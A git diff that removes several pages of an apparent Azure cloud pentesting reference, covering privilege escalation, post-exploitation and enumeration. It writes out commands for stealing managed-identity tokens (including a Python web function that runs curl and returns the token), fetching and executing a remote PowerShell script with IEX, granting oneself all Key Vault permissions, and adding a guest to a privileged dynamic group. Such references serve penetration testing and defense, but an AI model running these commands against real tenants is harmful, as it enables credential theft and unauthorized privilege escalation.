-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md b/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md deleted file mode 100644 index 8069be143..000000000 --- a/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md +++ /dev/null @@ -1,47 +0,0 @@ -# Az - Function Apps Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Funciton Apps Post Exploitaiton - -For more information about function apps check: - -{% content-ref url="../az-services/az-function-apps.md" %} -[az-function-apps.md](../az-services/az-function-apps.md) -{% endcontent-ref %} - -{% hint style="danger" %} -**Function Apps post exploitation tricks are very related to the privilege escalation tricks** so you can find all of them there: -{% endhint %} - -{% content-ref url="../az-privilege-escalation/az-functions-app-privesc.md" %} -[az-functions-app-privesc.md](../az-privilege-escalation/az-functions-app-privesc.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md b/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md deleted file mode 100644 index 0eb9a3592..000000000 --- a/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md +++ /dev/null @@ -1,90 +0,0 @@ -# Az - Table Storage Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Table Storage Post Exploitation - -For more information about table storage check: - -{% content-ref url="../az-services/az-table-storage.md" %} -[az-table-storage.md](../az-services/az-table-storage.md) -{% endcontent-ref %} - -### Microsoft.Storage/storageAccounts/tableServices/tables/entities/read - -A principal with this permission will be able to **list** the tables inside a table storage and **read the info** which might contain **sensitive information**. - -```bash -# List tables -az storage table list --auth-mode login --account-name - -# Read table (top 10) -az storage entity query \ - --account-name \ - --table-name \ - --auth-mode login \ - --top 10 -``` - -### Microsoft.Storage/storageAccounts/tableServices/tables/entities/write | Microsoft.Storage/storageAccounts/tableServices/tables/entities/add/action | Microsoft.Storage/storageAccounts/tableServices/tables/entities/update/action - -A principal with this permission will be able to **write and overwrite entries in tables** which might allow him to cause some damage or even escalate privileges (e.g. overwrite some trusted data that could abuse some injection vulnerability in the app using it). - -* The permission `Microsoft.Storage/storageAccounts/tableServices/tables/entities/write` allows all the actions. -* The permission `Microsoft.Storage/storageAccounts/tableServices/tables/entities/add/action` allows to **add** entries -* The permission `Microsoft.Storage/storageAccounts/tableServices/tables/entities/update/action` allows to **update** existing entries - -```bash -# Add -az storage entity insert \ - --account-name \ - --table-name \ - --auth-mode login \ - --entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager" - -# Replace -az storage entity replace \ - --account-name \ - --table-name \ - --auth-mode login \ - --entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager" - -# Update -az storage entity merge \ - --account-name \ - --table-name \ - --auth-mode login \ - --entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager" -``` - -### \*/delete - -This would allow to delete file inside the shared filesystem which might **interrupt some services** or make the client **lose valuable information**. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md b/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md deleted file mode 100644 index 92ecc5e14..000000000 --- a/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md +++ /dev/null @@ -1,67 +0,0 @@ -# Az - App Services Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## App Services - -For more information about Azure App services check: - -{% content-ref url="../az-services/az-app-services.md" %} -[az-app-services.md](../az-services/az-app-services.md) -{% endcontent-ref %} - -### Microsoft.Web/sites/publish/Action, Microsoft.Web/sites/basicPublishingCredentialsPolicies/read, Microsoft.Web/sites/config/read, Microsoft.Web/sites/read, - -These permissions allows to call the following commands to get a **SSH shell** inside a web app - -* Direct option: - -```bash -# Direct option -az webapp ssh --name --resource-group -``` - -* Create tunnel and then connect to SSH: - -{% code overflow="wrap" %} -```bash -az webapp create-remote-connection --name --resource-group - -## If successfull you will get a message such as: -#Verifying if app is running.... -#App is running. Trying to establish tunnel connection... -#Opening tunnel on port: 39895 -#SSH is available { username: root, password: Docker! } - -## So from that machine ssh into that port (you might need generate a new ssh session to the jump host) -ssh root@127.0.0.1 -p 39895 -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md b/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md deleted file mode 100644 index 9b72dba49..000000000 --- a/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md +++ /dev/null @@ -1,78 +0,0 @@ -# Az - Dynamic Groups Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -**Dynamic groups** are groups that has a set of **rules** configured and all the **users or devices** that match the rules are added to the group. Every time a user or device **attribute** is **changed**, dynamic rules are **rechecked**. And when a **new rule** is **created** all devices and users are **checked**. - -Dynamic groups can have **Azure RBAC roles assigned** to them, but it's **not possible** to add **AzureAD roles** to dynamic groups. - -This feature requires Azure AD premium P1 license. - -## Privesc - -Note that by default any user can invite guests in Azure AD, so, If a dynamic group **rule** gives **permissions** to users based on **attributes** that can be **set** in a new **guest**, it's possible to **create a guest** with this attributes and **escalate privileges**. It's also possible for a guest to manage his own profile and change these attributes. - -Get groups that allow Dynamic membership: **`az ad group list --query "[?contains(groupTypes, 'DynamicMembership')]" --output table`** - -### Example - -* **Rule example**: `(user.otherMails -any (_ -contains "security")) -and (user.userType -eq "guest")` -* **Rule description**: Any Guest user with a secondary email with the string 'security' will be added to the group - -For the Guest user email, accept the invitation and check the current settings of **that user** in [https://entra.microsoft.com/#view/Microsoft\_AAD\_IAM/TenantOverview.ReactView](https://entra.microsoft.com/#view/Microsoft_AAD_IAM/TenantOverview.ReactView).\ -Unfortunately the page doesn't allow to modify the attribute values so we need to use the API: - -{% code overflow="wrap" %} -```powershell -# Login with the gust user -az login --allow-no-subscriptions - -# Get user object ID -az ad signed-in-user show - -# Update otherMails -az rest --method PATCH \ - --url "https://graph.microsoft.com/v1.0/users/" \ - --headers 'Content-Type=application/json' \ - --body '{"otherMails": ["newemail@example.com", "anotheremail@example.com"]}' - -# Verify the update -az rest --method GET \ - --url "https://graph.microsoft.com/v1.0/users/" \ - --query "otherMails" -``` -{% endcode %} - -## References - -* [https://www.mnemonic.io/resources/blog/abusing-dynamic-groups-in-azure-ad-for-privilege-escalation/](https://www.mnemonic.io/resources/blog/abusing-dynamic-groups-in-azure-ad-for-privilege-escalation/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md b/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md deleted file mode 100644 index 200b90d6d..000000000 --- a/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md +++ /dev/null @@ -1,60 +0,0 @@ -# Az - Key Vault Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Azure Key Vault - -For more information about this service check: - -{% content-ref url="../az-services/keyvault.md" %} -[keyvault.md](../az-services/keyvault.md) -{% endcontent-ref %} - -### Microsoft.KeyVault/vaults/write - -An attacker with this permission will be able to modify the policy of a key vault (the key vault must be using access policies instead of RBAC). - -```bash -# If access policies in the output, then you can abuse it -az keyvault show --name - -# Get current principal ID -az ad signed-in-user show --query id --output tsv - -# Assign all permissions -az keyvault set-policy \ - --name \ - --object-id \ - --key-permissions all \ - --secret-permissions all \ - --certificate-permissions all \ - --storage-permissions all -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-services/README.md b/pentesting-cloud/azure-security/az-services/README.md deleted file mode 100644 index d2f2876e2..000000000 --- a/pentesting-cloud/azure-security/az-services/README.md +++ /dev/null @@ -1,99 +0,0 @@ -# Az - Services - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Portals - -You can find the list of **Microsoft portals in** [**https://msportals.io/**](https://msportals.io/) - -### Raw requests - -#### Azure API via Powershell - -Get **access\_token** from **IDENTITY\_HEADER** and **IDENTITY\_ENDPOINT**: `system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');`. - -Then query the Azure REST API to get the **subscription ID** and more . - -```powershell -$Token = 'eyJ0eX..' -$URI = 'https://management.azure.com/subscriptions?api-version=2020-01-01' -# $URI = 'https://graph.microsoft.com/v1.0/applications' -$RequestParams = @{ - Method = 'GET' - Uri = $URI - Headers = @{ - 'Authorization' = "Bearer $Token" - } -} -(Invoke-RestMethod @RequestParams).value - -# List resources and check for runCommand privileges -$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resources?api-version=2020-10-01' -$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups//providers/Microsoft.Compute/virtualMachines/ func.HttpResponse: - logging.info('Python HTTP trigger function processed a request.') - IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT'] - IDENTITY_HEADER = os.environ['IDENTITY_HEADER'] - cmd = 'curl "%s?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER) - val = os.popen(cmd).read() - return func.HttpResponse(val, status_code=200) -``` - -## List of Services - -**The pages of this section are ordered by Azure service. In there you will be able to find information about the service (how it works and capabilities) and also how to enumerate each service.** - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-services/az-acr.md b/pentesting-cloud/azure-security/az-services/az-acr.md deleted file mode 100644 index e3c5bf95c..000000000 --- a/pentesting-cloud/azure-security/az-services/az-acr.md +++ /dev/null @@ -1,76 +0,0 @@ -# Az - ACR - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -Azure Container Registry (ACR) is a managed service provided by Microsoft Azure for **storing and managing Docker container images and other artifacts**. It offers features such as integrated developer tools, geo-replication, security measures like role-based access control and image scanning, automated builds, webhooks and triggers, and network isolation. It works with popular tools like Docker CLI and Kubernetes, and integrates well with other Azure services. - -### Enumerate - -To enumerate the service you could use the script [**Get-AzACR.ps1**](https://github.com/NetSPI/MicroBurst/blob/master/Misc/Get-AzACR.ps1): - -{% code overflow="wrap" %} -```bash -# List Docker images inside the registry -IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/NetSPI/MicroBurst/master/Misc/Get-AzACR.ps1") - -Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Internet Explorer\Main" -Name "DisableFirstRunCustomize" -Value 2 - -Get-AzACR -username -password -registry .azurecr.io -``` -{% endcode %} - -{% tabs %} -{% tab title="az cli" %} -```bash -az acr list --output table -az acr show --name MyRegistry --resource-group MyResourceGroup -``` -{% endtab %} - -{% tab title="Az Powershell" %} -```powershell -# List all ACRs in your subscription -Get-AzContainerRegistry - -# Get a specific ACR -Get-AzContainerRegistry -ResourceGroupName "MyResourceGroup" -Name "MyRegistry" -``` -{% endtab %} -{% endtabs %} - -Login & Pull from the registry - -```bash -docker login .azurecr.io --username --password -docker pull .azurecr.io/: -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-services/az-application-proxy.md b/pentesting-cloud/azure-security/az-services/az-application-proxy.md deleted file mode 100644 index 8b5f6c1c0..000000000 --- a/pentesting-cloud/azure-security/az-services/az-application-proxy.md +++ /dev/null @@ -1,66 +0,0 @@ -# Az - Application Proxy - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -[From the docs:](https://learn.microsoft.com/en-us/entra/identity/app-proxy/application-proxy) - -Azure Active Directory's Application Proxy provides **secure remote access to on-premises web applications**. After a **single sign-on to Azure AD**, users can access both **cloud** and **on-premises applications** through an **external URL** or an internal application portal. - -It works like this: - -
- -1. After the user has accessed the application through an endpoint, the user is directed to the **Azure AD sign-in page**. -2. After a **successful sign-in**, Azure AD sends a **token** to the user's client device. -3. The client sends the token to the **Application Proxy service**, which retrieves the user principal name (UPN) and security principal name (SPN) from the token. **Application Proxy then sends the request to the Application Proxy connector**. -4. If you have configured single sign-on, the connector performs any **additional authentication** required on behalf of the user. -5. The connector sends the request to the **on-premises application**. -6. The **response** is sent through the connector and Application Proxy service **to the user**. - -## Enumeration - -```powershell -# Enumerate applications with application proxy configured -Get-AzureADApplication | %{try{Get-AzureADApplicationProxyApplication -ObjectId $_.ObjectID;$_.DisplayName;$_.ObjectID}catch{}} - -# Get applications service principal -Get-AzureADServicePrincipal -All $true | ?{$_.DisplayName -eq "Name"} - -# Use the following ps1 script from https://learn.microsoft.com/en-us/azure/active-directory/app-proxy/scripts/powershell-display-users-group-of-app -# to find users and groups assigned to the application. Pass the ObjectID of the Service Principal to it -Get-ApplicationProxyAssignedUsersAndGroups -ObjectId -``` - -## References - -* [https://learn.microsoft.com/en-us/azure/active-directory/app-proxy/application-proxy](https://learn.microsoft.com/en-us/azure/active-directory/app-proxy/application-proxy) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-services/az-arm-templates.md b/pentesting-cloud/azure-security/az-services/az-arm-templates.md deleted file mode 100644 index b594c6aa7..000000000 --- a/pentesting-cloud/azure-security/az-services/az-arm-templates.md +++ /dev/null @@ -1,57 +0,0 @@ -# Az - ARM Templates / Deployments - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -[From the docs:](https://learn.microsoft.com/en-us/azure/azure-resource-manager/templates/overview) To implement **infrastructure as code for your Azure solutions**, use Azure Resource Manager templates (ARM templates). The template is a JavaScript Object Notation (**JSON**) file that **defines** the **infrastructure** and configuration for your project. The template uses declarative syntax, which lets you state what you intend to deploy without having to write the sequence of programming commands to create it. In the template, you specify the resources to deploy and the properties for those resources. - -### History - -If you can access it, you can have **info about resources** that are not present but might be deployed in the future. Moreover, if a **parameter** containing **sensitive info** was marked as "**String**" **instead** of "**SecureString**", it will be present in **clear-text**. - -## Search Sensitive Info - -Users with the permissions `Microsoft.Resources/deployments/read` and `Microsoft.Resources/subscriptions/resourceGroups/read` can **read the deployment history**. - -```powershell -Get-AzResourceGroup -Get-AzResourceGroupDeployment -ResourceGroupName - -# Export -Save-AzResourceGroupDeploymentTemplate -ResourceGroupName -DeploymentName -cat .json # search for hardcoded password -cat | Select-String password -``` - -## References - -* [https://app.gitbook.com/s/5uvPQhxNCPYYTqpRwsuS/\~/changes/argKsv1NUBY9l4Pd28TU/pentesting-cloud/azure-security/az-services/az-arm-templates#references](az-arm-templates.md#references) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md b/pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md deleted file mode 100644 index 5f6a84345..000000000 --- a/pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md +++ /dev/null @@ -1,91 +0,0 @@ -# Az - State Configuration RCE - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
